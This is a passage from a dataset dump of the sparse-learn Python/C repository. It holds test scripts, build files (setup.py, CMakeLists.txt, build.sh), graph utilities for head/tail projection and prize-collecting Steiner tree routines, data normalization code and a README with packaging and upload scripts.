/ 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n re = tail_proj(edges=edges, weights=weights, x=x, g=1, s=4, root=-1,\n max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test3 result tail nodes: ', re_nodes)\n print('test3 result tail edges: ', re_nodes)\n re = tail_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n root=-1, max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test4 result tail nodes: ', re_nodes)\n print('test4 result tail edges: ', re_nodes)\n wrapper = HeadTailWrapper(edges=edges, weights=weights)\n re = wrapper.run_head(x=x, g=1, s=4, budget=3., delta=1. / 169.)\n re_nodes, re_edges, p_x = re\n print('test5 result head nodes: ', re_nodes)\n print('test5 result head edges: ', re_nodes)\n re = wrapper.run_tail(x=x, g=1, s=4, budget=3, nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test6 result tail nodes: ', re_nodes)\n print('test6 result tail edges: ', re_nodes)\n\n\ndef test_fast_pcst():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n n, m = len(weights), edges.shape[1]\n x = np.random.normal(0.0, 0.1, 25)\n sub_graph = [6, 7, 8, 9]\n x[sub_graph] = 5.\n # edges, prizes, weights, root, g, pruning, epsilon, verbose\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test7 result pcst nodes: ', re_nodes)\n print('test7 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=np.zeros(n), weights=weights, root=-1,\n g=1, pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test8 result pcst nodes: ', re_nodes)\n print('test8 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test9 result pcst nodes: ', re_nodes)\n print('test9 result pcst edges: ', re_nodes)\n\n\ndef test_mst():\n print('-' * 100)\n edges, weights = simu_graph(25, rand=True) # get grid graph\n start_time = time.time()\n selected_indices = minimal_spanning_tree(edges=edges, weights=weights, num_nodes=25)\n print('run time:', (time.time() - start_time))\n for index in selected_indices:\n print(index, weights[index])\n selected_edges = {(i, j): None for (i, j) in edges[selected_indices]}\n import networkx as nx\n from pylab import rcParams\n import matplotlib.pyplot as plt\n from matplotlib.pyplot import subplots_adjust\n subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n rcParams['figure.figsize'] = 14, 14\n G = nx.Graph()\n for edge in edges:\n G.add_edge(edge[0], edge[1])\n pos, edge_posi = dict(), dict()\n length, width, index = 5, 5, 0\n for i in range(length):\n for j in range(width):\n G.add_node(index)\n pos[index] = (j, length - i)\n if (j, length - i) in selected_edges or (length - i, j) in selected_edges:\n edge_posi[index] = (j, length - i)\n index += 1\n nx.draw_networkx_nodes(G, pos, node_size=100, nodelist=range(length * width), node_color='gray')\n nx.draw_networkx_edges(G, pos, alpha=0.5, width=2, edge_color='r')\n plt.axis('off')\n plt.show()\n\n\ndef test_mst_performance():\n edges, weights = simu_graph(1000000, rand=True) # get grid graph\n x = np.random.normal(0.0, 0.1, 1000000)\n sub_graph = range(10000, 11000)\n x[sub_graph] = 50.\n start_time = 
time.time()\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes1, re_edges1 = re\n print('run time of original pcst: ', (time.time() - start_time))\n start_time = time.time()\n selected_indices = minimal_spanning_tree(edges=edges, weights=weights, num_nodes=1000000)\n print('run time of mst:', (time.time() - start_time))\n start_time = time.time()\n edges, weights = edges[selected_indices], weights[selected_indices]\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n print('run time of original pcst: ', (time.time() - start_time))\n re_nodes2, re_edges2 = re\n print(len(re_nodes1))\n print(len(re_nodes2))\n print(len(set(re_nodes1).intersection(re_nodes2)))\n\n\ndef test_graph_ghtp():\n x_tr = np.asarray([[1., 2., 3., 4.], [1., 2., 3., 4.], [1., 2., 3., 4.]], dtype=np.float64)\n y_tr = np.asarray([1., 1., -1.], dtype=np.float64)\n w0 = np.asarray([0., 0., 0., 0., 0.])\n lr = 0.1\n sparsity = 2\n tol = 1e-6\n max_iter = 50\n eta = 1e-3\n ghtp_logistic_py(x_tr=x_tr, y_tr=y_tr, w0=w0, lr=lr, sparsity=sparsity, tol=tol, max_iter=max_iter, eta=eta)\n\n\ndef main():\n test_graph_ghtp()\n\n\nif __name__ == '__main__':\n test_proj_algo()" }, { "alpha_fraction": 0.6168277263641357, "alphanum_fraction": 0.6225128173828125, "avg_line_length": 33.490196228027344, "blob_id": "e082f3b9d4387a81dcb60576b642997a22afd5d2", "content_id": "a2fe41fc14e29841c949296a4168fcce762dec97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1759, "license_type": "permissive", "max_line_length": 78, "num_lines": 51, "path": "/setup.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a wrapper of head and tail projection. 
To generate sparse_module.so\nfile, please use the following command (suppose you have Linux/MacOS/MacBook):\n python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom setuptools import setup\nfrom setuptools import find_packages\nfrom distutils.core import Extension\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsrc_files = ['sparse_learn/c/main_wrapper.c',\n 'sparse_learn/c/head_tail_proj.c',\n 'sparse_learn/c/fast_pcst.c',\n 'sparse_learn/c/sort.c']\ncompile_args = ['-shared', '-Wall', '-g', '-O3', '-fPIC', '-std=c11', '-lm']\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"sparse_learn\",\n version=\"0.1.1\",\n author=\"Baojian Zhou\",\n author_email=\"bzhou6@albany.edu\",\n description=\"A package related with sparse learning methods.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n use_2to3=True,\n url=\"https://github.com/baojianzhou/sparse-learn\",\n packages=find_packages(),\n install_requires=['numpy'],\n include_dirs=[numpy.get_include()],\n headers=['sparse_learn/c/head_tail_proj.h',\n 'sparse_learn/c/fast_pcst.h',\n 'sparse_learn/c/sort.h'],\n ext_modules=[\n Extension('sparse_learn',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\", ],\n keywords='sparse learning, structure sparsity, head/tail projection')\n" }, { "alpha_fraction": 0.7109915614128113, "alphanum_fraction": 0.7263643145561218, "avg_line_length": 43.89655303955078, "blob_id": "5da06b82aaa8c7ff02b4607986ea019314de8d7b", "content_id": "39dc5a292f1423599c95dd3be108bf1660b675fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1301, "license_type": "permissive", "max_line_length": 112, "num_lines": 29, "path": "/CMakeLists.txt", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\ninclude_directories(sparse_learn/c/)\nproject(sparse-learn C)\n\nset(CMAKE_C_STANDARD 11)\nset(CMAKE_C_FLAGS \"-Wall -Wextra -std=c11 -O3 -fPIC\")\n\nset(PYTHON_INCLUDE \"/home/baojian/anaconda3/include/python3.7m\")\nset(NUMPY_INCLUDE \"/home/baojian/anaconda3/lib/python3.7/site-packages/numpy/core/include/\")\nset(PYTHON_LIB \"/home/baojian/anaconda3/lib/\")\n\ninclude_directories(${PYTHON_INCLUDE})\nset(C_PATH sparse_learn/c/)\nset(FAST_PCST_SRC ${C_PATH}fast_pcst.c ${C_PATH}fast_pcst.h)\nset(HEAD_TAIL_SRC ${C_PATH}head_tail_proj.c ${C_PATH}head_tail_proj.h)\nset(SORT_SRC ${C_PATH}sort.c ${C_PATH}sort.h)\n\nadd_executable(test_fast_pcst ${C_PATH}fast_pcst_test.c ${FAST_PCST_SRC})\ntarget_link_libraries(test_fast_pcst -Wall -O3 -lm)\n\nadd_executable(test_head_tail_proj ${C_PATH}head_tail_proj_test.c ${HEAD_TAIL_SRC} ${FAST_PCST_SRC} ${SORT_SRC})\ntarget_link_libraries(test_head_tail_proj -Wall -O3 -lm)\n\nadd_executable(test_sort ${C_PATH}sort_test.c ${C_PATH}sort.c ${C_PATH}sort.h)\ntarget_link_libraries(test_sort -Wall -O3 -lm)\n\nadd_library(sparse_learn SHARED ${C_PATH}main_wrapper.c ${FAST_PCST_SRC} ${HEAD_TAIL_SRC} ${SORT_SRC})\ntarget_link_libraries(sparse_learn -std=c11 -Wall -Wextra -O3\n -I${OPENBLAS_INCLUDE} -I${NUMPY_INCLUDE} -L${OPENBLAS_LIB} -lm -lpthread)" }, { "alpha_fraction": 0.6552567481994629, "alphanum_fraction": 0.6772615909576416, "avg_line_length": 50.25, "blob_id": 
"537fc7a9c97643cd99237f2553b3b2566e662463", "content_id": "5c2238bbfbadcb9a8abe31b992e04e3d0361b0ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 409, "license_type": "permissive", "max_line_length": 85, "num_lines": 8, "path": "/sparse_learn/c/build.sh", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "#!/bin/bash\nsort_src=\"sort.h sort.c\"\nfast_pcst_src=\"fast_pcst.h fast_pcst.c\"\nhead_tail_src=\"head_tail_proj.h head_tail_proj.c\"\nall_src=\"${sort_src} ${fast_pcst_src} ${head_tail_src}\"\ngcc -g -Wall -std=c11 -O3 ${sort_src} sort_test.c -o test_sort\ngcc -g -Wall -std=c11 -O3 ${fast_pcst_src} fast_pcst_test.c -o test_fast_pcst\ngcc -g -Wall -std=c11 -O3 ${all_src} head_tail_proj_test.c -o test_head_tail_proj -lm" }, { "alpha_fraction": 0.5758162140846252, "alphanum_fraction": 0.5878849029541016, "avg_line_length": 34.31694030761719, "blob_id": "502a12ded28c13752f80f4b72d98f840e7862213", "content_id": "8eb3b93f61acd17287e053a3f918525441880cd9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12926, "license_type": "permissive", "max_line_length": 114, "num_lines": 366, "path": "/sparse_learn/graph_utils.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['simu_graph', 'draw_graph', 'simu_grid_graph', 'HeadTailWrapper', 'head_proj', 'tail_proj',\n 'minimal_spanning_tree', 'random_walk', 'fast_pcst']\n\nimport random\nimport numpy as np\n\ntry:\n import c_sparse_learn\n\n try:\n from c_sparse_learn import c_proj_pcst\n from c_sparse_learn import c_proj_head\n from c_sparse_learn import c_proj_tail\n except ImportError:\n print('cannot some functions')\n exit(0)\nexcept ImportError:\n print('cannot find the package c_sparse_learn')\n\n\ndef simu_graph(num_nodes, rand=False, graph_type='grid'):\n \"\"\"\n To generate a grid graph. Each node has 4-neighbors.\n :param num_nodes: number of nodes in the graph.\n :param rand: if rand True, then generate random weights in (0., 1.)\n :param graph_type: ['grid', 'chain']\n :return: edges and corresponding to unite weights.\n \"\"\"\n edges, weights = [], []\n if graph_type == 'grid':\n length = int(np.sqrt(num_nodes))\n width, index = length, 0\n for i in range(length):\n for j in range(width):\n if (index % length) != (length - 1):\n edges.append((index, index + 1))\n if index + length < int(width * length):\n edges.append((index, index + length))\n else:\n if index + length < int(width * length):\n edges.append((index, index + length))\n index += 1\n edges = np.asarray(edges, dtype=int)\n elif graph_type == 'chain':\n for i in range(num_nodes - 1):\n edges.append((i, i + 1))\n else:\n edges = []\n\n # generate weights of the graph\n if rand:\n weights = []\n while len(weights) < len(edges):\n rand_x = np.random.random()\n if rand_x > 0.:\n weights.append(rand_x)\n weights = np.asarray(weights, dtype=np.float64)\n else:\n weights = np.ones(len(edges), dtype=np.float64)\n return edges, weights\n\n\ndef simu_grid_graph(width, height, rand_weight=False):\n \"\"\"Generate a grid graph.\n To generate a grid graph. Each node has 4-neighbors. Please see more\n details in https://en.wikipedia.org/wiki/Lattice_graph. 
For example,\n we can generate 5x3(width x height) grid graph\n 0---1---2---3---4\n | | | | |\n 5---6---7---8---9\n | | | | |\n 10--11--12--13--14\n by using simu_grid_graph(5, 3)\n We can also generate a 1x5 chain graph\n 0---1---2---3---4\n by using simu_grid_graph(5, 1)\n :param width: width of this grid graph.\n :param height: height of this grid graph.\n :param rand_weight: generate weights from U(1., 2.) if it is True.\n :return: edges and corresponding edge costs.\n return two empty [],[] list if there was any error occurring.\n \"\"\"\n if width < 0 and height < 0:\n print('Error: width and height should be positive.')\n return [], []\n width, height = int(width), int(height)\n edges, weights = [], []\n index = 0\n for i in range(height):\n for j in range(width):\n if (index % width) != (width - 1):\n edges.append((index, index + 1))\n if index + width < int(width * height):\n edges.append((index, index + width))\n else:\n if index + width < int(width * height):\n edges.append((index, index + width))\n index += 1\n edges = np.asarray(edges, dtype=int)\n # random generate costs of the graph\n if rand_weight:\n weights = []\n while len(weights) < len(edges):\n weights.append(random.uniform(1., 2.0))\n weights = np.asarray(weights, dtype=np.float64)\n else: # set unit weights for edge costs.\n weights = np.ones(len(edges), dtype=np.float64)\n return edges, weights\n\n\ndef random_walk(edges, s, init_node=None, restart=0.0):\n \"\"\"Random generate a connected subgraph by using random walk.\n Given a connected undirected graph (represented as @param:edges), a random\n walk is a procedure to generate a connected subgraph with s different\n nodes. Please check more details in the first paragraph of section 1.\n basic notations and facts of reference [1] in Page 3.\n Reference: [1] Lovász, László. 
\"Random walks on graphs: A survey.\"\n Combinatorics, Paul erdos is eighty 2.1 (1993): 1-46.\n :param edges: input graph as the list of edges.\n :param s: the number of nodes in the returned subgraph.\n :param init_node: initial point of the random walk.\n :param restart: with a fix probability to restart from the initial node.\n :return: a list of s nodes and a list of walked edges.\n return two empty list if there was any error occurring.\n \"\"\"\n adj, nodes = dict(), set()\n for edge in edges: # construct the adjacency matrix.\n uu, vv = int(edge[0]), int(edge[1])\n nodes.add(uu)\n nodes.add(vv)\n if uu not in adj:\n adj[uu] = set()\n adj[uu].add(vv)\n if vv not in adj:\n adj[vv] = set()\n adj[vv].add(uu)\n if init_node is None:\n # random select an initial node.\n rand_start_point = random.choice(list(nodes))\n init_node = list(adj.keys())[rand_start_point]\n if init_node not in nodes:\n print('Error: the initial_node is not in the graph!')\n return [], []\n if not (0.0 <= restart < 1.0):\n print('Error: the restart probability not in (0.0,1.0)')\n return [], []\n if not (0 <= s <= len(nodes)):\n print('Error: the number of nodes not in [0,%d]' % len(nodes))\n return [], []\n subgraph_nodes, subgraph_edges = set(), set()\n next_node = init_node\n subgraph_nodes.add(init_node)\n if s <= 1:\n return subgraph_nodes, subgraph_edges\n # get a connected subgraph with s nodes.\n while len(subgraph_nodes) < s:\n next_neighbors = list(adj[next_node])\n rand_nei = random.choice(next_neighbors)\n subgraph_nodes.add(rand_nei)\n subgraph_edges.add((next_node, rand_nei))\n subgraph_edges.add((rand_nei, next_node))\n next_node = rand_nei # go to next node.\n if random.random() < restart:\n next_node = init_node\n return list(subgraph_nodes), list(subgraph_edges)\n\n\ndef draw_graph(sub_graph, edges, length, width):\n \"\"\"\n To draw a grid graph.\n :param sub_graph:\n :param edges:\n :param length:\n :param width:\n :return:\n \"\"\"\n import networkx as nx\n from pylab import rcParams\n import matplotlib.pyplot as plt\n from matplotlib.pyplot import subplots_adjust\n subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n rcParams['figure.figsize'] = 14, 14\n\n G = nx.Graph()\n for edge in edges:\n G.add_edge(edge[0], edge[1])\n pos = dict()\n index = 0\n for i in range(length):\n for j in range(width):\n G.add_node(index)\n pos[index] = (j, length - i)\n index += 1\n nx.draw_networkx_nodes(G, pos, node_size=100,\n nodelist=range(33 * 33), node_color='gray')\n nx.draw_networkx_nodes(G, pos, node_size=100,\n nodelist=sub_graph, node_color='b')\n nx.draw_networkx_edges(G, pos, alpha=0.5, width=2)\n plt.axis('off')\n plt.show()\n\n\ndef minimal_spanning_tree(edges, weights, num_nodes):\n \"\"\"\n Find the minimal spanning tree of a graph.\n :param edges: ndarray dim=(m,2) -- edges of the graph.\n :param weights: ndarray dim=(m,) -- weights of the graph.\n :param num_nodes: int, number of nodes in the graph.\n :return: (the edge indices of the spanning tree)\n \"\"\"\n try:\n from proj_module import mst\n except ImportError:\n print('cannot find this functions: proj_pcst')\n exit(0)\n select_indices = mst(edges, weights, num_nodes)\n return select_indices\n\n\ndef fast_pcst(edges, prizes, weights, root, g, pruning, epsilon, verbose):\n \"\"\"\n Fast PCST algorithm using C11 language\n :param edges:\n :param prizes:\n :param root:\n :param weights:\n :param g:\n :param pruning:\n :param verbose:\n :param epsilon: to control the precision\n :return:\n \"\"\"\n if not np.any(prizes): # 
make sure\n return np.asarray([], dtype=int), np.asarray([], dtype=int)\n if not (weights > 0.).all():\n print('all weights must be positive.')\n # TODO to check variables.\n return c_proj_pcst(edges, prizes, weights, root, g, pruning, epsilon, verbose)\n\n\nclass HeadTailWrapper(object):\n \"\"\"\n The Python wrapper for the head and tail approx. algorithms.\n \"\"\"\n\n def __init__(self, edges, weights):\n \"\"\" head and tail approximation package\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n \"\"\"\n self._edges = edges\n self._weights = weights\n if not (self._weights > 0.0).all():\n print('Error: all edge weights must be positive.')\n exit()\n\n def run_tail(self, x, g, s, budget, nu):\n \"\"\" Run tail approximation algorithm\n :param x: input vector for projection.\n :param g: number of connected components\n :param s: sparsity\n :param budget: budget\n :param nu: parameter nu used in the tail approx. algorithm.\n :return: (nodes, edges,proj_vector):\n projected nodes, edges and projected vector.\n \"\"\"\n return tail_proj(self._edges, self._weights, x, g, s, budget, nu)\n\n def run_head(self, x, g, s, budget, delta):\n \"\"\" Run head approximation algorithm.\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget: budget\n :param delta: parameter delta used in the head approx. algorithm.\n :return: (nodes, edges,proj_vector):\n projected nodes, edges and projected vector.\n \"\"\"\n return head_proj(self._edges, self._weights, x, g, s, budget, delta)\n\n\ndef head_proj(edges, weights, x, g, s, budget=None, delta=None, max_iter=None,\n err_tol=None, root=None, pruning=None, epsilon=None, verbose=None):\n \"\"\"\n Head projection algorithm.\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget:\n :param delta:\n :param max_iter: maximal iterations in head projection.\n :param err_tol: error tolerance for lower bound search bound.\n :param root: -1, no root for pcst\n :param pruning:\n :param epsilon:\n :param verbose:\n :return:\n \"\"\"\n if budget is None:\n budget = 1. * (s - g)\n if delta is None:\n delta = 1. / 169.\n if max_iter is None:\n max_iter = 50\n if err_tol is None:\n err_tol = 1e-6\n if root is None:\n root = -1\n if pruning is None:\n pruning = 'strong'\n if verbose is None:\n verbose = 0\n if epsilon is None:\n epsilon = 1e-6\n # if it is a zero vector, then just return an empty graph\n if not np.any(x):\n p_x = np.zeros_like(x) # projected vector\n return np.asarray([], dtype=int), np.asarray([], dtype=int), p_x\n # [re_nodes, re_edges, p_x]\n return c_proj_head(edges, weights, x, g, s, budget, delta, max_iter, err_tol, root, pruning, epsilon, verbose)\n\n\ndef tail_proj(edges, weights, x, g, s, budget=None, nu=None,\n max_iter=None, err_tol=None, root=None, pruning=None, verbose=None, epsilon=None):\n \"\"\"\n Tail projection algorithm.\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget:\n :param nu:\n :param max_iter: maximal iterations\n :param err_tol:\n :param root: -1, no root for pcst\n :param pruning\n :param verbose\n :param epsilon\n :return:\n \"\"\"\n if budget is None:\n budget = 1. 
* (s - g)\n if nu is None:\n nu = 2.5\n if max_iter is None:\n max_iter = 50\n if err_tol is None:\n err_tol = 1e-6\n if root is None:\n root = -1\n if pruning is None:\n pruning = 'strong'\n if verbose is None:\n verbose = 0\n if epsilon is None:\n epsilon = 1e-6\n # if it is a zero vector, then just return an empty graph\n if not np.any(x):\n p_x = np.zeros_like(x) # projected vector\n return np.asarray([], dtype=int), np.asarray([], dtype=int), p_x\n # [re_nodes, re_edges, proj_x]\n return c_proj_tail(edges, weights, x, g, s, budget, nu, max_iter, err_tol, root, pruning, epsilon, verbose)\n" }, { "alpha_fraction": 0.4487379193305969, "alphanum_fraction": 0.4549703896045685, "avg_line_length": 40.14102554321289, "blob_id": "3ed497d36e5ac7d9b778003f4e0b348e32232f61", "content_id": "737c4ad83b091a16e9dd3c7bab3d7d20620c66d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3209, "license_type": "permissive", "max_line_length": 72, "num_lines": 78, "path": "/sparse_learn/data_process.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['data_normalize', 'get_list_files']\nimport os\nimport numpy as np\n\n\ndef data_normalize(x_train, x_test, opts='min-max'):\n \"\"\" Normalize train and test directly.\"\"\"\n if opts == 'l2': # l2 normalization method\n for i in range(len(x_train)):\n for j in range(len(x_train[i])):\n vector = x_train[i][j, :]\n if np.linalg.norm(vector) != 0.0:\n x_train[i][j, :] = vector / np.linalg.norm(vector)\n else:\n x_train[i][j, :] = vector\n for i in range(len(x_test)):\n for j in range(len(x_test[i])):\n vector = x_test[i][j, :]\n if np.linalg.norm(vector) != 0.0:\n x_test[i][j, :] = vector / np.linalg.norm(vector)\n else:\n x_test[i][j, :] = vector\n elif opts == 'min-max': # min-max scaling method to [0,1]\n for ii in range(len(x_train)):\n for jj in range(len(x_train[ii])):\n vector = x_train[ii][jj, :]\n max_ = np.max(vector, axis=0)\n min_ = np.min(vector, axis=0)\n if max_ == min_:\n x_train[ii][jj, :] = vector\n else:\n x_train[ii][jj, :] = (vector - min_) / (max_ - min_)\n for ii in range(len(x_test)):\n for jj in range(len(x_test[ii])):\n vector = x_test[ii][jj, :]\n max_ = np.max(vector, axis=0)\n min_ = np.min(vector, axis=0)\n if max_ == min_:\n x_test[ii][jj, :] = vector\n else:\n x_test[ii][jj, :] = (vector - min_) / (max_ - min_)\n # standardization ( or Z-score normalization) normalize x to\n # [mu=0,std=1.] 
search:\n # [Sebastian Raschka About Feature Scaling and Normalization]\n # often used in logistic regression, SVMs, perceptrons, NNs\n elif opts == 'std':\n for i in range(len(x_train)):\n for j in range(len(x_train[i])):\n vector = x_train[i][j, :]\n mean_v = np.mean(vector)\n std_v = np.std(vector)\n if std_v != 0.0:\n x_train[i][j, :] = (vector - mean_v) / std_v\n else:\n x_train[i][j, :] = vector\n for i in range(len(x_test)):\n for j in range(len(x_test[i])):\n vector = x_test[i][j, :]\n mean_v = np.mean(vector)\n std_v = np.mean(vector)\n if np.linalg.norm(vector) != 0.0:\n x_test[i][j, :] = (vector - mean_v) / std_v\n else:\n x_test[i][j, :] = vector\n\n\ndef get_list_files(input_folder, prefix=None):\n if not os.path.exists(input_folder):\n file_list = []\n return file_list\n for (dir_path, dir_names, file_names) in os.walk(input_folder):\n file_list = sorted([os.path.join(input_folder, filename)\n for filename in file_names])\n if prefix is None or prefix == '':\n return file_list\n file_list = [_ for _ in file_list if _.find(prefix) != -1]\n return file_list\n" }, { "alpha_fraction": 0.488095223903656, "alphanum_fraction": 0.5, "avg_line_length": 13, "blob_id": "744c5f447ab5d29e0d15686c134ff8dc2ce48a6b", "content_id": "b609f6b7f5edbeddf9b1d22774cafadb71a12338", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/sparse_learn/algo_graph_da.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['algo_graph_da']\n\n\ndef algo_graph_da():\n pass\n" }, { "alpha_fraction": 0.5056179761886597, "alphanum_fraction": 0.516853928565979, "avg_line_length": 13.833333015441895, "blob_id": "1477877c4ee29248b8adf7acdebc085f56230af3", "content_id": "5ede096c53b915ffe0de2baf148df3b18cc8688d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/sparse_learn/algo_graph_sto_iht.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['algo_graph_da']\n\n\ndef algo_graph_sto_iht():\n pass\n" }, { "alpha_fraction": 0.5607082843780518, "alphanum_fraction": 0.6045531034469604, "avg_line_length": 41.35714340209961, "blob_id": "f27520ba3bc300ecf75d972f75ad1a2ca9ac38e1", "content_id": "79d3a6dcabf55172f0f561e8029874dce18985a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/sparse_learn/examples/example_test_proj.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sparse_learning.proj_algo import head_proj\nfrom sparse_learning.proj_algo import tail_proj\nfrom sparse_learning.fast_pcst import fast_pcst\nfrom sparse_learning.graph_utils import simu_graph\n\ndef test_proj_head():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. 
/ 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n print(p_x)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. / 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n print(p_x)\n" }, { "alpha_fraction": 0.6328431367874146, "alphanum_fraction": 0.6392157077789307, "avg_line_length": 29.893939971923828, "blob_id": "163283661506e7c509962527375ea7f7989d701a", "content_id": "9cac59c6c816b35a02672a591b3cfd0078627045", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2040, "license_type": "permissive", "max_line_length": 73, "num_lines": 66, "path": "/README.md", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# sparse-learn\nThe sparse learning related methods.\n\n\n#---\n#!/usr/bin/env bash\n# this file is for uploading.\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\npython setup.py sdist bdist_wheel\ntwine upload dist/*.tar.gz\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nHow to run it ? python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom os import path\nfrom setuptools import setup\nfrom distutils.core import Extension\n\nhere = path.abspath(path.dirname(__file__))\n\nsrc_files = ['c/main_wrapper.c', 'c/head_tail_proj.c', 'c/fast_pcst.c']\ncompile_args = ['-std=c11', '-lpython2.7', '-lm']\n# calling the setup function\nsetup(\n # sparse_learning package.\n name='sparse_learning',\n # current version is 0.2.1\n version='0.2.4',\n # this is a wrapper of head and tail projection.\n description='A wrapper for sparse learning algorithms.',\n # a long description should be here.\n long_description='This package collects sparse learning algorithms.',\n # url of github projection.\n url='https://github.com/baojianzhou/sparse_learning.git',\n # number of authors.\n author='Baojian Zhou',\n # my email.\n author_email='bzhou6@albany.edu',\n include_dirs=[numpy.get_include()],\n license='MIT',\n packages=['sparse_learning'],\n classifiers=(\"Programming Language :: Python :: 2\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",),\n # specify requirements of your package here\n install_requires=['numpy'],\n headers=['c/head_tail_proj.h', 'c/fast_pcst.h'],\n # define the extension module\n ext_modules=[Extension('proj_module',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n keywords='sparse learning, structure sparsity, head/tail projection')\n\nStep 1:\npip wheel /dir/to/proj-name/ -w /dir/where/wheels/are/written/\n\n" }, { "alpha_fraction": 0.5134063363075256, "alphanum_fraction": 0.5394887924194336, "avg_line_length": 34.624534606933594, "blob_id": "738c9350cf5956aa47fc07b6e2f09e041f01e8b5", "content_id": "b0502bd794125deea9e8edc8259588595f387b5d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9585, "license_type": "permissive", "max_line_length": 77, "num_lines": 269, "path": "/sparse_learn/base.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: 
